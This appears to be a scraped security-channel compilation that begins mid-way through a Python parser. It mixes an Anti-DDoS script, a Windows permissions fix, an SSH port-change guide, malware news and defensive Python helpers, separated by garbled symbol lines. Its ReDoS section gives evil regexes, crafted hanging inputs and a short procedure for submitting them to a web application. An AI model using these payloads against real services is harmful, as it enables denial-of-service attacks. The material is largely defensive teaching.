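            raise KgdbocError("baud rate given without a serial device")
        result["baud"] = int(tokens[i])
        i += 1
    if i != len(tokens):
        raise KgdbocError(f"unexpected or out-of-order token {tokens[i]!r}")
    if result["kms"] and not result["kbd"]:
        # the docs say kms with only gdb (no kdb keyboard) is rarely useful
        result["warning"] = "kms without kbd is generally not a useful combination"
    return result


if __name__ == "__main__":
    for example in ("kgdboc=ttyS0,115200", "kbd,ttyS0,115200", "kms,kbd"):
        print(example, "->", parse_kgdboc(example))
```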
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Anti-DDOS is an open source project developed to protect against DoS and DDoS attacks.
> The project is written in bash. It works by writing iptables rules into the Linux operating system, applying the necessary defensive configuration.
> It only works on Linux (100% compatible with Linux operating systems). It does not provide 100% security; it only helps you take the necessary measures.
t.me/UndercodeTesting
π¦ πβπππΈπππππΈπππβ & βπβ:
1) Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/Anti-DDOS.git
> Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/Anti-DDOS.git
2) cd Anti-DDOS
3) RUN
root@ismailtasdelen:~# bash ./anti-ddos.sh
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Basic common error fix: Win10 access denied [application method]
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
> Many people do not know how to handle the "access denied" error in Windows 10, so this post explains how to deal with it.
1) Open the C: drive, find the WindowsApps folder, right-click it, choose Properties, open the Security tab, and edit the permissions.
2) In the "Group and user name" list, select your current login account; if it is not listed, add it (in the Add dialog, select all object types, then enter the object name, such as -PC / Administrator). Let's look at how to solve access denied in Win10.
3) Open the C: drive, find WindowsApps, right-click it, choose Properties, open the Security tab, and edit the permissions.
4) In the "Group and user name" list, select your current login account; if it is not listed, add it (select all object types and enter the object name, such as -PC / Administrator).
5) Modify the corresponding permissions as required.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Vulnerable Regex in online repositories Example :
twitter.com/UndercOdeTC
1) RegExLib, id=1757 (email validation) - see the nested repetition (bold in the original), which is an Evil Regex
^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$
Input:
aaaaaaaaaaaaaaaaaaaaaaaa!
2) OWASP Validation Regex Repository, Java Classname - see the nested repetition (bold in the original), which is an Evil Regex
^(([a-z])+.)+[A-Z]([a-z])+$
Input:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
π¦ Web application attack
1) Open a JavaScript
2) find Evil Regex
3) Craft a malicious input for the found Regex
4) Submit a valid value via intercepting proxy
5) Change the request to contain a malicious input
You are done!
π¦ ReDoS via Regex Injection
> The following example checks whether the username is part of the password entered by the user.
String userName = textBox1.Text;
String password = textBox2.Text;
Regex testPassword = new Regex(userName);
Match match = testPassword.Match(password);
if (match.Success) {
    MessageBox.Show("Do not include name in password.");
} else {
    MessageBox.Show("Good password.");
}
> If an attacker enters ^(([a-z])+.)+[A-Z]([a-z])+$ as the username and aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! as the password, the program will hang.
@UndercOdeOfficial
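An added example (mine, not from the post or from OWASP) in Python: a heuristic that flags the repeated-group-inside-a-repeated-group shape of the two Evil Regexes above, plus the safe form of the username-in-password check from the regex injection snippet, which treats the username as data rather than as a pattern. The function names and the plain comparison pattern are assumptions.

```python
import re

# Both patterns are the "Evil Regex" examples quoted above (OWASP / RegExLib).
EVIL_EMAIL = r"^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$"
EVIL_CLASSNAME = r"^(([a-z])+.)+[A-Z]([a-z])+$"


def has_nested_quantifier(pattern: str) -> bool:
    """Heuristic ReDoS check: a repeated group that itself contains a repeat.

    Only +, * and {n,m} count as repeats; '?' is ignored because on its own it
    adds no unbounded backtracking. Character classes and escapes are skipped.
    This is a linter-style heuristic (assumption), not a proof of safety.
    """
    stack = []          # one entry per open group: does it contain a quantifier?
    last_group = None   # quantifier flag of the group that just closed, if any
    i = 0
    while i < len(pattern):
        c = pattern[i]
        if c == "\\":                       # escaped character: skip it
            i += 2
            last_group = None
            continue
        if c == "[":                        # character class: skip to ']'
            j = pattern.find("]", i + 1)
            i = len(pattern) if j == -1 else j + 1
            last_group = None
            continue
        if c == "(":
            stack.append(False)
            last_group = None
        elif c == ")":
            inner = stack.pop() if stack else False
            if stack:                       # parent contains whatever the child had
                stack[-1] = stack[-1] or inner
            last_group = inner
        elif c in "+*{":
            if last_group:                  # repeating a group that already repeats
                return True
            if stack:
                stack[-1] = True
            if c == "{":                    # skip the {n,m} body
                j = pattern.find("}", i)
                i = len(pattern) if j == -1 else j
            last_group = None
        else:
            last_group = None
        i += 1
    return False


def password_contains_username(user_name: str, password: str) -> bool:
    """Safe version of the page's check: a plain substring test, no regex."""
    return user_name.lower() in password.lower()


def safe_regex_search(user_input: str, text: str) -> bool:
    """If a regex API is unavoidable, escape user input so it is matched
    literally; metacharacters such as ( + $ then cannot form an Evil Regex."""
    return re.search(re.escape(user_input), text) is not None


if __name__ == "__main__":
    for name, pat in (("email", EVIL_EMAIL), ("classname", EVIL_CLASSNAME), ("plain", r"^[a-z]+$")):
        print(f"{name:10s} nested quantifier: {has_nested_quantifier(pat)}")
    print(password_contains_username("alice", "xAlice42!"))
```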
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Linux SECURITY :
> Changing the default SSH port 22 on Linux to prevent password cracking
twitter.com/UndercodeTC
π¦ ππΌππ πππΈβπ :
1) On Linux / Unix systems, many people log in to the server with SSH and a password. The default port 22 is at risk of being brute-forced, so it is common to move SSH to a random port number.
2) To be on the safe side, it is recommended to first add a random SSH port number and the corresponding firewall rules, then try to connect to the server on the new port. If that works, remove the default port 22.
3) The advantage of this is that if the newly configured port cannot be reached, you can still log in on the default port 22; otherwise, if something goes wrong, you may no longer be able to reach the server over SSH at all, which is miserable.
written by UNdercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ First, modify the configuration file
T.me/UndercOdeTesting
1) Modify the configuration file /etc/ssh/sshd_config
vim /etc/ssh/sshd_config
change
#Port 22
#ListenAddress 0.0.0.0
#ListenAddress ::
to
Port 22
Port 23456
#ListenAddress 0.0.0.0
#ListenAddress ::
2) As above, uncomment Port 22 and add a line Port 23456 below it.
3) The default SSH listening port is 22; unless you explicitly configure otherwise, remote login on port 22 is open by default whether "Port 22" is commented or uncommented.
> Port 22 is uncommented and kept above so that a permissions or configuration problem that makes the new port inaccessible does not lock you out, which would be awkward.
4) The added line Port 23456 is the replacement for the default port 22. When you change the port, choose a number between 10000 and 65535. Ports below 10000 are easily occupied by the system, by special software, or by newly installed applications, so do not use port numbers below 10000.
5) Make the sshd configuration take effect
> Execute the following command to make the sshd configuration take effect.
a) CentOS 7.x or above, execute the command
systemctl restart sshd.service
b) CentOS 6.x or below, execute the command
/etc/init.d/sshd restart
6) After taking effect, log in with the new port number
ssh root@47.106.126.167 -p 23456
# ssh root@47.106.126.167 -p 23456
root@47.106.126.167's password:
7) Enter the password to log in.
Note: At this point, both port 22 and port 23456 can be used to log in over SSH.
8) Once you have confirmed that you can log in on the new port, comment out port 22
vim /etc/ssh/sshd_config
Comment out port 22; the final configuration is as follows
#Port 22
Port 23456
#ListenAddress 0.0.0.0
#ListenAddress ::
10) Finally, don't forget to reload the configuration so the change takes effect
11) CentOS 7.x or above, execute the command
systemctl restart sshd.service
12) CentOS 6.x or below, execute the command
/etc/init.d/sshd restart
13) Third, allow the new port number in the firewall
On cloud instances running releases before CentOS 7, the default firewall is iptables; note that a default iptables configuration does not block access.
14) If you have configured iptables rules, run the following command to allow the new port:
iptables -A INPUT -p tcp --dport 23456 -j ACCEPT
15) Then restart the firewall
service iptables restart
> Explanation :
16) Firewalld is installed by default on CentOS 7 and later.
First, check whether the firewall has already opened port 23456.
> firewall-cmd --permanent --query-port=23456/tcp
17) If the result is no, port 23456 is not open; add the new port number with the command
> firewall-cmd --permanent --add-port=23456/tcp
18) If the result is success, TCP port 23456 has been opened.
Next, reload the firewall policy for the configuration to take effect
> firewall-cmd --reload
19) Finally, check again whether port 23456 is open
> firewall-cmd --permanent --query-port=23456/tcp
20) If the new port number is open, yes will be printed this time
> Fourth, allow the new port number in the security group
21) Many cloud server vendors such as Alibaba Cloud and Tencent Cloud have security group policies. If the firewall allows the new port but the security group does not, you will still not be able to log in over SSH. Therefore, you also need to open the new port number in the security group.
21) Log in to the ECS Management Console, locate the instance, and select Network and Security Group.
22) On the Security Group Rule page, click Add Security Group Rule, define the rule according to your actual usage scenario, and allow the newly configured remote port to connect.
written by UNdercOde
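An added example (mine, not from the post) in Python that applies steps 1-2 and 8 of the procedure above to sshd_config text: add_port uncomments Port 22 and adds the new port below it so both stay usable, and retire_port comments out the old port only after you have confirmed the new one works. The function names and the constructed sample config are assumptions.

```python
# Hypothetical helpers (not part of OpenSSH): rewrite sshd_config text in the
# two phases the procedure above describes. Port numbers follow the page's
# advice: use 10000-65535 to avoid clashes with system or application ports.

MIN_PORT, MAX_PORT = 10000, 65535


def _port_lines(lines):
    """Yield (index, active, port) for every 'Port N' or '#Port N' line."""
    for i, line in enumerate(lines):
        stripped = line.strip()
        active = not stripped.startswith("#")
        parts = stripped.lstrip("#").strip().split()
        if len(parts) == 2 and parts[0].lower() == "port" and parts[1].isdigit():
            yield i, active, int(parts[1])


def add_port(config: str, new_port: int, keep_port: int = 22) -> str:
    """Phase 1: make sshd listen on new_port *in addition to* keep_port.

    keep_port is uncommented if needed so that a broken new port cannot lock
    you out. Running this twice does not add a second 'Port new_port' line.
    """
    if not MIN_PORT <= new_port <= MAX_PORT:
        raise ValueError(f"choose a port between {MIN_PORT} and {MAX_PORT}")
    lines = config.splitlines()
    entries = list(_port_lines(lines))
    if any(active and port == new_port for _, active, port in entries):
        return config                                   # already configured
    keep_idx = None
    for i, active, port in entries:
        if port == keep_port:
            lines[i] = f"Port {keep_port}"              # ensure it is active
            keep_idx = i
    if keep_idx is None:                                # no Port line at all
        lines.insert(0, f"Port {keep_port}")
        keep_idx = 0
    lines.insert(keep_idx + 1, f"Port {new_port}")      # directly below it
    return "\n".join(lines) + "\n"


def retire_port(config: str, old_port: int) -> str:
    """Phase 2: comment out old_port once the new port has been verified.

    Refuses to leave sshd with no active Port line.
    """
    lines = config.splitlines()
    entries = list(_port_lines(lines))
    remaining = [p for _, a, p in entries if a and p != old_port]
    if not remaining:
        raise ValueError("refusing to remove the only active Port line")
    for i, active, port in entries:
        if active and port == old_port:
            lines[i] = f"#Port {old_port}"
    return "\n".join(lines) + "\n"


# Constructed sample resembling the stock sshd_config lines quoted above
SAMPLE_CONFIG = "#Port 22\n#ListenAddress 0.0.0.0\n#ListenAddress ::\n"

if __name__ == "__main__":
    phase1 = add_port(SAMPLE_CONFIG, 23456)
    print(phase1)              # Port 22 active with Port 23456 below it
    print(retire_port(phase1, 22))
```

Apply the result with your usual editor or configuration management and restart sshd between the phases exactly as the steps above describe.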
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ From yesterday: NEW BUG
> Guardicore's security researchers have revealed a sophisticated malware attack that successfully destroyed more than 800 devices belonging to mid-sized companies in the medical technology industry. The malware masquerades as a WAV file and contains Monero mining software that uses the infamous EternalBlue vulnerability to compromise devices on the network.
> The only bug in this malware was that it eventually caused a Blue Screen of Death (BSOD) on the infected computer and displayed the corresponding error code, which made the victim suspicious and triggered an in-depth investigation of the incident.
> Researchers said the BSOD was first observed on October 14, when the crashing machine was trying to execute a long command line (actually a base64-encoded PowerShell script). After decoding it, the researchers obtained a readable PowerShell script that was used to deploy the malware. The script first checks the system architecture (based on pointer size). It then reads the value stored in the registry subkey mentioned above and loads it into memory using the Windows API function WriteProcessMemory. The researchers noted that the malware payload is executed by obtaining and calling function pointer delegates.
> The malware tried to spread to other devices on the network using an EternalBlue-based exploit, the same vulnerability used by WannaCry in 2017, which infected thousands of computers worldwide. After reverse engineering the malware, the researchers found that it hides a Monero mining module inside a WAV file and uses the CryptonightR algorithm to mine Monero. In addition, the malware uses steganography to hide its malicious modules in an innocuous-looking WAV file.
> Researchers found that completely removing the malware, including terminating its malicious processes, prevented the BSOD from recurring on the victim device.
π¦ This post is from twitter.com/UndercOdeTC; you can get more updates from them.
written by UNdercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β